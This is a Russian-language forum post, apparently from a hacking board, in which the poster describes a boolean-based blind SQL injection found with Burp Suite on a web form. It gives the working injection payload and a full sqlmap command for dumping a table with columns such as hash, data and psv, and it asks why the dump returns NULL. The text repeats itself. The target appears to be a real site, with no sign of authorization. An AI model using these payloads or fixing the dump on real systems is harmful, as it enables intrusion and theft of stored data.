Привет, есть инъекция которую раскрутил через burp suite через boolean-based blind. Знаю таблицу и столбцы в ней, хотел использовать sqlmap для дампа данных, но возвращаются все строки с параметрами NULL:
Команда в мапе: --url '
А вот данные запроса в burp'e: customer=-1 OR /*!case when ((SELECT SUBSTRING(GROUP_CONCAT(id,hash,data,psv,name,valid,completed,date),1,1) FROM base.table) = '1') then 5 else 0 end
*Так посимвольно я и узнал, что таблица не пуста, но почему возвращается NULL непонятно...
Помогите советом, что делаю не так((
Команда в мапе: --url '
Ссылка скрыта от гостей
' --data 'customer=-1 OR 2&submit=Senden' --method POST -D base -T table -C id,hash,data,psv,name,valid,completed,date --batch --random-agent --dumpА вот данные запроса в burp'e: customer=-1 OR /*!case when ((SELECT SUBSTRING(GROUP_CONCAT(id,hash,data,psv,name,valid,completed,date),1,1) FROM base.table) = '1') then 5 else 0 end
*Так посимвольно я и узнал, что таблица не пуста, но почему возвращается NULL непонятно...
Помогите советом, что делаю не так((
